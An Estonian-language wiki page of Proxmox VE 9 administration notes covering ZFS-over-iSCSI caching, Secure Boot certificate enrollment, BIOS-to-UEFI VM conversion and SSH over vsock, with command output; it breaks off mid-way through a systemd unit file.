* https://pve.proxmox.com/pve-docs-7/chapter-pve-firewall.html

===Misc===

Tundub, et pve 9 ja qemu 11 kandis on hakanud ilmuma 'x86_64 v2 aes' virtuaalse protsessori kasutamisel sellised teated, nt 'host' protsessoriga neid ei ole

<pre>
root@pve-wrx90e:~# pveversion
pve-manager/9.2.3/d0fde103346cf89a (running kernel: 7.0.6-2-pve)

root@pve-wrx90e:~# dmesg | grep WRMSR | tail -n 4
[30021.694536] kvm: kvm [323176]: vcpu0, guest rIP: 0xffffffffb807e744 Unhandled WRMSR(0xc0010007) = 0xffff
[30090.614209] kvm: kvm [324048]: vcpu0, guest rIP: 0xffffffff84e6d9b4 Unhandled WRMSR(0xc0010007) = 0xffff
[30308.798770] kvm: kvm [326811]: vcpu0, guest rIP: 0xffffffff8d67e744 Unhandled WRMSR(0xc0010007) = 0xffff
[180421.745980] kvm: kvm [3632532]: vcpu0, guest rIP: 0xffffffff81242297 Unhandled WRMSR(0xc0010007) = 0xffff
</pre>

===arm64 platvormi emuleerimine===

Tundub, et PVE v. 9.2 juures ilmub webgui peale vcpu valik 'arm (64-bit)'

[[Fail:20260614-pve-01.png|600px]]

kus

* tulemusena ta töötab, aga väga nö rahulikult

<pre>
root@pve-svc-02:~# apt-get install pve-edk2-firmware-aarch6
</pre>

===Kasulikud lisamaterjalid===

* TODO

Proxmox v. 9 kasutamine

2026-06-20T17:00:03Z

Imre: /* Üle vsock ssh kasutamine - Ubuntu 24.04 */

===Sissejuhatus===

TODO

===Virtuaalne riistvara===

Klaviatuur ja hiir

<pre>
root@pwrk-02:~# systool -b serio
Bus = "serio"

Device = "serio0"
Device = "serio1"

root@pwrk-02:~# systool -b serio -v
Bus = "serio"

Device = "serio0"
Device path = "/sys/devices/platform/i8042/serio0"
bind_mode = "auto"
description = "i8042 KBD port"
drvctl = <store method only>
err_count = "0"
extra = "0"
firmware_id = "PNP: PNP0303"
force_release = "369-370"
modalias = "serio:ty06pr00id00ex00"
scroll = "0"
set = "2"
softraw = "1"
softrepeat = "0"
uevent = "DRIVER=atkbd
SERIO_TYPE=06
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty06pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0303"

Device = "serio1"
Device path = "/sys/devices/platform/i8042/serio1"
bind_mode = "auto"
description = "i8042 AUX port"
drvctl = <store method only>
firmware_id = "PNP: PNP0f13"
modalias = "serio:ty01pr00id00ex00"
protocol = "VirtualPS/2"
rate = "100"
resetafter = "5"
resolution = "200"
resync_time = "0"
uevent = "DRIVER=psmouse
SERIO_TYPE=01
SERIO_PROTO=00
SERIO_ID=00
SERIO_EXTRA=00
MODALIAS=serio:ty01pr00id00ex00
SERIO_FIRMWARE_ID=PNP: PNP0f13"
</pre>

===remote zfs over iscsi===

====Mõisted====

* FUA (Forced Unit Access) -
* WCE (Write Cache Enable) -
* TPU (Thin Provisioning UNMAP) -
* TPWS (WRITE_SAME / Zeroing) -
* VFS (virtual file system) -

====Tööpõhimõte====

Virtuaalse arvuti vaatest andmetega tegelemine

pve virtuaalne arvuti -> pve füüsiline arvuti -> over-iscsi-zfs-storage-server

Sõltuvalt qemu virtuaalse arvuti virtuaalse plokkseadme 'Cache' seadistustest on võimalik erinevate cache komplektide-kombinatsioonide kasutamine andmete liikumisel virtuaalses arvutis töötava protsessi juurest zfs storage serveri füüsilisele plokkseadmele. Tundub, et 2025 aastal on kõige keskmisemale kasutusele sobiv valik 'Cache: nocache'

* hea jõudlus
* hea terviklus

Andmete liikumise teekond

* virtuaalse arvuti rakendus
* virtuaalse arvuti vfs failisüsteem
* virtuaalse arvuti page cache (vfs'ga seotud)
* virtuaalse arvuti ext4 failisüsteem (ext4 draiver)
* virtuaalse arvuti lvm
* virtuaalse arvuti fdisk partitsioonid
* virtuaalse arvuti virtuaalne sata vms kontroller
* füüsilise arvuti qemu protsess
* füüsilise arvuti open-iscsi poolt teostatud /dev/sda scsi plokkseade (puudub cache)
* füüsilises arvutis storage'ga seotud cache puudub
* storage arvuti targetcli (puutub cache)
* storage arvuti zfs ressurss (sisaldab zfs cache)
* storage avuti füüsilise plokkseadme controller-cache

'Cache: nocache' parameeter on üks vähestest parameetritest, mis avaldab mõju nö mõlemas suunas

* virtuaalse arvuti seest kasutada olevale storage ressursile
* kuidas füüsilise arvuti sees virtuaalsele arvutile vastav qemu protsess kasutab allolevat plokkseadet

Käesolevas tekstis kirjeldatakse nelja komponendi seadistamist

* virtuaalsele arvutile vastav qemu protsess
* iscsi initiator
* iscsi target
* zfs lahendus

====zfs lahendus iscsi target arvutis====

Füüsilised kettad on kasutusel nö kõige tavalisemal viisil, eriti tähendab see, et ketastel on sisselülitatud nö tavaline controller-cache

<pre>
root@pve-svc-02:~# lsscsi -s | grep 4.00T
[2:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdc 4.00TB
[3:0:0:0] disk ATA CT4000MX500SSD1 045 /dev/sdd 4.00TB
[N:0:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme0n1 4.00TB
[N:1:1:1] disk Samsung SSD 990 PRO with Heatsink 4TB__1 /dev/nvme1n1 4.00TB
</pre>

zfs lülituse moodustamine

<pre>
root@pve-svc-02:~# cat create-zpool-raidz1-x4.sh
zpool create -o ashift=13 zp_data raidz1 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FE58 \
/dev/disk/by-id/ata-CT4000MX500SSD1_2246E686FF7B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501827B \
/dev/disk/by-id/nvme-Samsung_SSD_990_PRO_with_Heatsink_4TB_S7DSNJ0X501856Z
</pre>

zfs cache töötab tavalisel viisil, st on sisse lülitatud olekus, nt

<pre>
root@pve-svc-02:~# zfs get all | grep -i cache | grep vm-106-disk-0
zp_crucial_mx_4/vm-106-disk-0 primarycache all default
zp_crucial_mx_4/vm-106-disk-0 secondarycache all default
</pre>

====targetcli iscsi target arvutis====

targetcli seadistamine koosneb kahest tegevusest

* zfs põhise alus-storage storage publitseerimine
* publitseerimisel sobivalt scsi protokolli parameetrite kasutamine (eriti cache, sparse jms esitamine)

<pre>
/> /iscsi create iqn.2025-10.moraal.srv:storage.zfstarget
/> /iscsi/iqn.2025-10.moraal.srv:storage.zfstarget/tpg1/acls create iqn.1993-08.org.debian:01:4cbe32bd26b
</pre>

Sobiv seadistus, mis tuleb plokk-ressursi jaoks kehtestada

<pre>
root@pve-svc-02:~# targetcli /backstores/block/zp_crucial_mx_4-vm-108613-disk-4 get attribute | grep =
======================
alua_support=1
block_size=512
emulate_3pc=1
emulate_caw=1
emulate_dpo=1
emulate_fua_read=1
emulate_fua_write=1
emulate_model_alias=1
emulate_pr=1
emulate_rest_reord=0
emulate_rsoc=1
emulate_tas=1
emulate_tpu=0
emulate_tpws=0
emulate_ua_intlck_ctrl=0
emulate_write_cache=0
enforce_pr_isids=1
force_pr_aptpl=0
hw_block_size=512 [ro]
hw_max_sectors=32768 [ro]
hw_pi_prot_type=0 [ro]
hw_queue_depth=128 [ro]
is_nonrot=1
max_unmap_block_desc_count=1
max_unmap_lba_count=131072
max_write_same_len=65535
optimal_sectors=32768
pgr_support=1
pi_prot_format=0
pi_prot_type=0
pi_prot_verify=0
queue_depth=128
submit_type=0
unmap_granularity=8
unmap_granularity_alignment=0
unmap_zeroes_data=0
</pre>

kus

* TODO

Muudatuse tegemine

<pre>
/backstores/b...108613-disk-4> set attribute emulate_tpws=0
/backstores/b...108613-disk-4> set attribute emulate_tpu=0
</pre>

Kasutamine paistab välja selline

<pre>
root@pve-svc-02:~# targetcli
targetcli shell version 2.1.53
Copyright 2011-2013 by Datera, Inc and others.
For help on commands, type 'help'.

/> ls
o- / ......................................................................................................................... [...]
o- backstores .............................................................................................................. [...]
| o- block .................................................................................................. [Storage Objects: 3]
| | o- zp_crucial_mx_4-vm-100-disk-0 ......................... [/dev/zp_crucial_mx_4/vm-100-disk-0 (20.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-106-disk-5 ......................... [/dev/zp_crucial_mx_4/vm-106-disk-5 (16.0GiB) write-thru activated]
| | | o- alua ................................................................................................... [ALUA Groups: 1]
| | | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| | o- zp_crucial_mx_4-vm-108613-disk-1 .................... [/dev/zp_crucial_mx_4/vm-108613-disk-1 (4.0GiB) write-thru activated]
| | o- alua ................................................................................................... [ALUA Groups: 1]
| | o- default_tg_pt_gp ....................................................................... [ALUA state: Active/optimized]
| o- fileio ................................................................................................. [Storage Objects: 0]
| o- pscsi .................................................................................................. [Storage Objects: 0]
| o- ramdisk ................................................................................................ [Storage Objects: 0]
o- iscsi ............................................................................................................ [Targets: 1]
| o- iqn.2025-10.moraal.srv:storage.zfstarget .......................................................................... [TPGs: 1]
| o- tpg1 ............................................................................................... [no-gen-acls, no-auth]
| o- acls .......................................................................................................... [ACLs: 1]
| | o- iqn.1993-08.org.debian:01:4cbe32bd26b ................................................................ [Mapped LUNs: 3]
| | o- mapped_lun0 ...................................................... [lun0 block/zp_crucial_mx_4-vm-108613-disk-1 (rw)]
| | o- mapped_lun1 ......................................................... [lun1 block/zp_crucial_mx_4-vm-106-disk-5 (rw)]
| | o- mapped_lun2 ......................................................... [lun2 block/zp_crucial_mx_4-vm-100-disk-0 (rw)]
| o- luns .......................................................................................................... [LUNs: 3]
| | o- lun0 .............. [block/zp_crucial_mx_4-vm-108613-disk-1 (/dev/zp_crucial_mx_4/vm-108613-disk-1) (default_tg_pt_gp)]
| | o- lun1 .................... [block/zp_crucial_mx_4-vm-106-disk-5 (/dev/zp_crucial_mx_4/vm-106-disk-5) (default_tg_pt_gp)]
| | o- lun2 .................... [block/zp_crucial_mx_4-vm-100-disk-0 (/dev/zp_crucial_mx_4/vm-100-disk-0) (default_tg_pt_gp)]
| o- portals .................................................................................................... [Portals: 1]
| o- 0.0.0.0:3260 ..................................................................................................... [OK]
o- loopback ......................................................................................................... [Targets: 0]
o- srpt ............................................................................................................. [Targets: 0]
o- vhost ............................................................................................................ [Targets: 0]
o- xen-pvscsi ....................................................................................................... [Targets: 0]
/>
</pre>

Lisaks saab portaali käest küsida attribute ja parameter komplekte, nt

<pre>
root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get parameter | grep =
======================
AuthMethod=CHAP
DataDigest=CRC32C,None
DataPDUInOrder=Yes
DataSequenceInOrder=Yes
DefaultTime2Retain=20
DefaultTime2Wait=2
ErrorRecoveryLevel=0
FirstBurstLength=65536
HeaderDigest=CRC32C,None
IFMarkInt=Reject
IFMarker=No
ImmediateData=Yes
InitialR2T=Yes
MaxBurstLength=262144
MaxConnections=1
MaxOutstandingR2T=1
MaxRecvDataSegmentLength=8192
MaxXmitDataSegmentLength=262144
OFMarkInt=Reject
OFMarker=No
TargetAlias=LIO Target

root@pm60-trt:~# targetcli /iscsi/iqn.2022-09.ee.moraal:pbs-pub/tpg1 get attribute | grep =
======================
authentication=1
cache_dynamic_acls=0
default_cmdsn_depth=64
default_erl=0
demo_mode_discovery=1
demo_mode_write_protect=1
fabric_prot_type=0
generate_node_acls=0
login_keys_workaround=1
login_timeout=15
prod_mode_write_protect=0
t10_pi=0
tpg_enabled_sendtargets=1
root@pm60-trt:~#
</pre>

kus

* parameter - võrgus kõneldavad asjad
* attribute - lokaalselt olukorda määratlevad asjad

====iscsi initiator====

TODO

====qemu protsess====

Kasutamine

[[Fail:20251019-remote-zfs-over-iscsi-01.png|600px]]

====Kasulikud lisamaterjalid====

TODO

===Secure boot - nn Microsoft 2023 sertifikaat===

====Tööpõhimõte====

TODO

====Olemasolev olukord enne muudatust====

<pre>
root@pwrk-01:~# apt-get install efitools
root@pwrk-01:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====Muudatus====

<pre>
root@pve-wrx90e:~# qm enroll-efi-keys 902198
skipping - OS type is neither Windows 10 nor Windows 11

root@pve-wrx90e:~# qm set 902198 --ostype win10
root@pve-wrx90e:~# qm enroll-efi-keys 902198
root@pve-wrx90e:~# qm set 902198 --ostype l26
</pre>

ja

<pre>
from

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,pre-enrolled-keys=1,size=1M

to

efidisk0: si-dpool:vm-902198-disk-0,efitype=4m,ms-cert=2023w,pre-enrolled-keys=1,size=1M
</pre>

====Uus olukord peale muudatust====

<pre>
root@pwrk-02:~# (printf "db: \n"; efi-readvar -v db; printf "\nKEK: \n"; efi-readvar -v KEK) | grep -E "2011|2023"
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Windows Production PCA 2011
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation UEFI CA 2011
C=US, O=Microsoft Corporation, CN=Microsoft UEFI CA 2023
C=US, O=Microsoft Corporation, CN=Windows UEFI CA 2023
C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, CN=Microsoft Corporation KEK CA 2011
</pre>

====WebGUI abil====

WebGUI abil vm sertifikaat muudatus

Disk Action -> Enroll Updated Certificates

[[Fail:20260611-pve-ms-cert-2023-01.png|700px]]

kus

* TODO

===Misc===

====pveupdate====

* uuendab webgui liidese sertifikaadi

<pre>
root@pve-wrx90e:~# pveupdate
Loading ACME account details
Placing ACME order
Order URL: https://acme-v02.api.letsencrypt.org/acme/order/2232348225/504476182801

Getting authorization details from 'https://acme-v02.api.letsencrypt.org/acme/authz/2232348225/694056506271'
The validation for pve-wrx90e.auul.pri.ee is pending!
Setting up webserver
Triggering validation
Sleeping for 5 seconds
Status is 'valid', domain 'pve-wrx90e.auul.pri.ee' OK!

All domains validated!

Creating CSR
Checking order status
Order is ready, finalizing order
valid!

Downloading certificate
Setting pveproxy certificate and key
Restarting pveproxy
Revoking old certificate
Revoke request to CA failed: Error: POST to https://acme-v02.api.letsencrypt.org/acme/revoke-cert
{
"type": "urn:ietf:params:acme:error:unauthorized",
"detail": "Unable to revoke :: Certificate is expired",
"status": 403
}
</pre>

====pveupgrade====

* uuendab süsteemi apt paketihaldusega tarkvara

===BIOS arvuti teisendamine UEFI arvutiks===

====Tööpõhimõte====

Peamised kaalutlused BIOS arvuti teisendamisel UEFI arvutiks

* vajadus saada osa secure boot lahendusega kaasnevast turvalisusest
* nö täieline reinstall oleks liiga aeganõudev, kohmakas jne

Muudatus seisneb virtuaalsele arvutile täiendava nö esimese plokkseadme lisamisel, suurusega 1 G. Sinna moodustatakse gpt partitsioonitabel ning vfat failisüsteem, ja ta vastab nö kataloogile /boot/efi, sinna ta ka monteeritakse kokkuvõttes. Juurfailisüsteem ja muu jääb sinna kus ta seni on olnud. Oluline on, et muudatuse käigus ei muudeta olemasoleva plokkseadme partitsioonitabelit ega lvm vms, st ebaõnnestumisel saab pöörduda tagasi kergesti (varundus peaks aga siiski olema olemas).

====Muudatuse protseduur====

Enne muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-01.png|700px]]

ning

<pre>
# df -T -h -t ext4
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
</pre>

Lisatakse töötavale arvutile 1 g plokkseade

Hardware -> Add disk -> ...

Veendutakse, mis on konkreetsel juhtumil 1 g lisatud plokkseadme nimi, nt

<pre>
# fdisk /dev/vdb -l
Disk /dev/vdb: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
</pre>

edasi käsundamine

<pre>
# apt-get install parted

# parted /dev/vdb mklabel gpt
# parted /dev/vdb mkpart primary fat32 1MiB 100%
# parted /dev/vdb set 1 esp on
# mkfs.vfat -F 32 /dev/vdb1
# mkdir -p /boot/efi
# blkid /dev/vdb1
</pre>

Muuta /etc/fstab faili, st lisada üks rida olemaoleva /boot rea alla, uuid on mitte partitsiooni, aga vfat failisüsteemi

<pre>
# cat /etc/fstab
..
UUID=XXXX-XXXX /boot/efi vfat defaults 0 2
</pre>

Lisada paketid

<pre>
# systemctl daemon-reload
# mount /boot/efi
# apt update
# apt install grub-efi-amd64-signed shim-signed mokutil
# grub-install --target=x86_64-efi --efi-directory=/boot/efi --bootloader-id=debian --removable
# update-grub
</pre>

tulemusena

<pre>
# find /boot/efi/ -type f -ls
115 932 -rwxr-xr-x 1 root root 952384 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.EFI
116 2624 -rwxr-xr-x 1 root root 2685544 mai 17 12:00 /boot/efi/EFI/BOOT/grubx64.efi
117 832 -rwxr-xr-x 1 root root 851368 mai 17 12:00 /boot/efi/EFI/BOOT/mmx64.efi
118 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/BOOTX64.CSV
119 4 -rwxr-xr-x 1 root root 112 mai 17 12:00 /boot/efi/EFI/BOOT/grub.cfg

# cat /boot/efi/EFI/BOOT/grub.cfg
search.fs_uuid 5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1 root
set prefix=($root)'/grub'
configfile $prefix/grub.cfg

# blkid /dev/vda1
/dev/vda1: UUID="5ebbc6f0-69e8-413b-bb4f-4ec0fa5d2fc1" BLOCK_SIZE="1024" TYPE="ext4" PARTUUID="cfa36d3a-01"
</pre>

Õeldakse virtuaalsele arvutile poweroff ja muudetakse seadistusi

* lisatakse 'EFI Disk' (virtuaalne efi riistvara seadistuste salvestamine jms)
* muudetakse bios -> uefi
* muudetakse chipset i440fx -> q35
* muudetakse display default -> virtio-gpu

Peale muudatust paistab virtuaalne arvuti selline

[[Fail:20260516-from-bios-to-uefi-02.png|700px]]

Lisaks on boot järjekorra seadmed muudetud

[[Fail:20260516-from-bios-to-uefi-03.png|700px]]

kus

* tingimata vajalik on virtio1 ja virtio0 - esimesel on bootload ja grub.cfg lühike konf, teisel on konfi sisuline osa

Tulemusena töötab arvuti uefi secure boot režiimis

<pre>
# mokutil --sb-state
SecureBoot enabled

# df -t vfat -t ext4 -T -h
Failisüsteem Tüüp Maht Kasut Vaba Kas% Haagitud
/dev/mapper/system-root ext4 11G 8,2G 2,2G 80% /
/dev/vda1 ext4 462M 325M 109M 75% /boot
/dev/vdb1 vfat 1020M 8,7M 1012M 1% /boot/efi
</pre>

Kõige lõpus võiks veel öelda, nii tekivad nö naturaalsed efibootmgr ja /boot/efi sissekanded nagu nad oleks seal nö sündinud-uefi'na arvutil

<pre>
# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}

# grub-install /dev/vdb
Installing for x86_64-efi platform.
Installation finished. No error reported.

# efibootmgr
BootCurrent: 0002
Timeout: 3 seconds
BootOrder: 0004,0002,0003,0000,0001
Boot0000* BootManagerMenuApp FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(eec25bdc-67f2-4d95-b1d5-f81b2039d11d)
Boot0001* EFI Firmware Setup FvVol(7cb8bdc9-f8eb-4f34-aaea-3ee4af6516a1)/FvFile(462caa21-7614-4503-836e-8ab6f4662331)
Boot0002* UEFI Misc Device PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xb,0x0){auto_created_boot_option}
Boot0003* UEFI Misc Device 2 PciRoot(0x0)/Pci(0x1e,0x0)/Pci(0x1,0x0)/Pci(0xa,0x0){auto_created_boot_option}
Boot0004* debian HD(1,GPT,0fb8cfd1-c90b-4da2-97db-ceda14464a90,0x800,0x1ff000)/File(\EFI\proxmox\shimx64.efi)
</pre>

====Boot Order märkused====

PVE webgui Boot Order määrab kaks

* millised plokkseadmed osalevad uefi faasis
* millised järjekorras plokkseadmed osalevad uefi faasis alglaadimisel

Kui on linnutatud ainult üks seade

[[Fail:20260516-from-bios-to-uefi-05.png|800px]]

Kui on linnutatud ainult kaks seadet

[[Fail:20260516-from-bios-to-uefi-04.png|800px]]

Antud juhul on see väga oluline kuna grub alglaadur on kahel seadmel laiali

* grub.efi rakendus asub /dev/vdb
* grub.conf seadistus asub /dev/vda

Kui Boot Order on linnutatud vaid /dev/vda, siis peatub arvuti käivitumine 'grub>' prompt juures. Selles mõttes võiks olla PVE webgui osakonna nimeks nt 'UEFI device visibility and Boot Order'.

===Üle vsock ssh kasutamine - Ubuntu 26.04 ja Debian v. 13===

Osutub, et uuemal ajal, st PVE v. 9, Debian v. 13 virtuaalne avuti on võimalik PVE host pealt pöörduda guest poole üle ssh kasutades vsock protokolli (mitte tavalist tcp/ip protokollil põhinevat võrku). Selleks tuleb virtuaalsele arvutile lisada PVE platvormi poolt vsock tugi

<pre>
root@pve-wrx90e:~# head -n 1 /etc/pve/qemu-server/50056.conf
args: -device vhost-vsock-pci,guest-cid=50056
</pre>

ja virtuaalsel arvutil peab olema tarkvaraline vsock tugi. Nt Debian v. 13 puhul on sshd serverisse see integreeritud

<pre>
root@unifi-oss:~# systemctl | grep ssh
ssh.service loaded active running OpenBSD Secure Shell server
sshd@2-50056:22-2:3327097365.service loaded active running OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097364)
system-sshd.slice loaded active active Slice /system/sshd
sshd-unix-local.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local)
sshd-vsock.socket loaded active listening OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK)
ssh-access.target loaded active active SSH Access Available
</pre>

kus

* systemd-ssh-generator on selline süsteem, mis käigult avastab süsteemi võimekusi ja vastavalt seadistab teenustele omadusi (nt ssh puhul lülitatakse sisse vsock tugi)

ning

<pre>
root@unifi-oss:~# systemctl status sshd@2-50056:22-2:3327097365.service
● sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365)
Loaded: loaded (/usr/lib/systemd/system/sshd@.service; static)
Active: active (running) since Mon 2026-06-01 00:04:39 EEST; 16s ago
Invocation: 84acdad56690460e8e0fbffd2ecd4d69
TriggeredBy: ● sshd-vsock.socket
Docs: man:sshd(8)
man:sshd_config(5)
Main PID: 876 (sshd-session)
Tasks: 1 (limit: 6978)
Memory: 1.8M (peak: 3.9M)
CPU: 27ms
CGroup: /system.slice/system-sshd.slice/sshd@2-50056:22-2:3327097365.service
‣ 876 "sshd-session: root [priv]"

Jun 01 00:04:39 unifi-oss systemd[1]: Started sshd@2-50056:22-2:3327097365.service - OpenBSD Secure Shell server per-connection daemon (vsock:2:3327097365).
Jun 01 00:04:40 unifi-oss sshd-session[876]: Accepted publickey for root from UNKNOWN port 65535 ssh2: ED25519 SHA256:3cj7QCk4leNOSQJlfeUeHr6YfsA0r3bRUqZS9Rey3jM
Jun 01 00:04:40 unifi-oss sshd-session[876]: pam_unix(sshd:session): session opened for user root(uid=0) by root(uid=0)
</pre>

kus

* triggered by 'sshd-vsock.socket'

ssh kliendi st pve host poolel peab olema teadmine, kuidas käituda kui üritatakse kasutada vsock protokolli üle sshd serverit

<pre>
root@pve-wrx90e:~# cat /lib/systemd/ssh_config.d/20-systemd-ssh-proxy.conf
# SPDX-License-Identifier: LGPL-2.1-or-later
#
# Allow connecting to the local host directly via ".host"
Host .host machine/.host
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy unix/run/ssh-unix-local/socket %p
ProxyUseFdpass yes
CheckHostIP no

# Make sure unix/* and vsock/* can be used to connect to AF_UNIX and AF_VSOCK paths.
# Make sure machine/* can be used to connect to local machines registered in machined.
#
Host unix/* vsock/* machine/*
ProxyCommand /usr/lib/systemd/systemd-ssh-proxy %h %p
ProxyUseFdpass yes
CheckHostIP no

# Disable all kinds of host identity checks, since these addresses are generally ephemeral.
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
</pre>

kus

* tuleb kasutada 'man systemd-ssh-proxy' utiliiti

Kasutamine paistab välja selline

<pre>
root@pve-wrx90e:~# ssh root@vsock/50056
Warning: Permanently added 'vsock/50056' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun May 31 23:53:37 2026 from 192.168.10.156
root@unifi-oss:~#

root@unifi-oss:~# w
23:59:55 up 6 min, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/1 - 23:59 1.00s 0.00s ? w
</pre>

kus

* vsock kaudu lähenemise puhul on iseloomulik 'FROM -' (tavaliselt on seal src ip aadress)

Peale kasutaja sisselogimist paistab

<pre>
root@unifi-oss:~# ss -a -p --vsock
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
v_str LISTEN 0 0 *:22 *:* users:(("systemd",pid=1,fd=66))
v_str ESTAB 0 0 50056:22 2:3327097366 users:(("sshd-session",pid=914,fd=7),("sshd-session",pid=914,fd=6),("sshd-session",pid=905,fd=7),("sshd-session",pid=905,fd=6),("systemd",pid=1,fd=8))
</pre>

kus

* af_vsock osakonnas on sarnasel af_inet osakonnale ka listen socket ning 'active connected socket'

Tundub, et uuemal ajal on ssh agar kuulama ka af_unix soketil

<pre>
root@unifi-oss:~# screendump | grep -i ssh
[ OK ] Listening on sshd-unix-local.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_UNIX Local).
[ OK ] Listening on sshd-vsock.socket - OpenSSH Server Socket (systemd-ssh-generator, AF_VSOCK).
[ OK ] Reached target ssh-access.target - SSH Access Available.
Starting ssh.service - OpenBSD Secure Shell server...
[ OK ] Started ssh.service - OpenBSD Secure Shell server.
</pre>

ja tõesti, lokaalselt saab arvutisse logida sisse nii

<pre>
root@unifi-oss:~# ssh unix/run/ssh-unix-local/socket
Warning: Permanently added 'unix/run/ssh-unix-local/socket' (ED25519) to the list of known hosts.
Linux unifi-oss 6.12.90+deb13.1-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.90-2 (2026-05-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 1 00:16:42 2026 from UNKNOWN

root@unifi-oss:~# w
00:16:44 up 23 min, 3 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/2 - 00:16 1.00s 0.00s ? w
root pts/1 - 00:16 2.00s 0.00s ? ssh unix/run/ssh-unix-local/socket
</pre>

Kasulikud lisamaterjalid

* https://www.auul.pri.ee/wiki/Linux_operatsioonis%C3%BCsteemis_t%C3%B6%C3%B6tab_v%C3%B5rgu%C3%BChendus#systemd_kasutamine_network-proxy_rollis

===Üle vsock ssh kasutamine - Ubuntu 24.04===

Ettevalmistavalt tuleb 22/tcp seadistada käima ainult konkreetselt ip aadressil

<pre>
root@zabbix-pub-01:~# grep ^Liste /etc/ssh/sshd_config
ListenAddress 192.168.10.194

root@zabbix-pub-01:~# systemctl status ssh.service
</pre>

Kusjuures vastav systemd ssh listen osakond jääb nagu on, 0.0.0.0 peale

<pre>
root@zabbix-pub-01:~# grep ^Lis /usr/lib/systemd/system/ssh.socket
ListenStream=0.0.0.0:22
</pre>

kus

* väidetavalt on see vajalik mingi sistemise systemd/ssh jne loogika toimimiseks.

ja laadida kerneli moodul

<pre>
root@zabbix-pub-01:~# modprobe vmw_vsock_virtio_transport
</pre>

Ubuntu 24.04 keskkonnas on tehniliselt kõik vajalik vsock kasutamiseks olemas, tuleb lisada kaks system elementi

* sshd-vsock.socket - õpetab systemd pid=1 protsessile kuulama võrgus 22/vsock pordil
* sshd-vsock@.service - õpetab 22/vsock pordile sissetuleva pöördumist üleandmist sshd protsessile

<pre>
root@zabbix-pub-01:~# ls -ld /etc/systemd/system/sshd-vsock*
-rw-r--r-- 1 root root 380 Jun 20 15:38 /etc/systemd/system/sshd-vsock@.service
-rw-r--r-- 1 root root 265 Jun 20 13:33 /etc/systemd/system/sshd-vsock.socket
</pre>

ning

<pre>
root@zabbix-pub-01:~# cat /etc/systemd/system/sshd-vsock.socket
[Unit]
Description=OpenSSH Server Socket (AF_VSOCK Network-Independent Line)
Documentation=man:sshd(8) man:sshd_config(5)
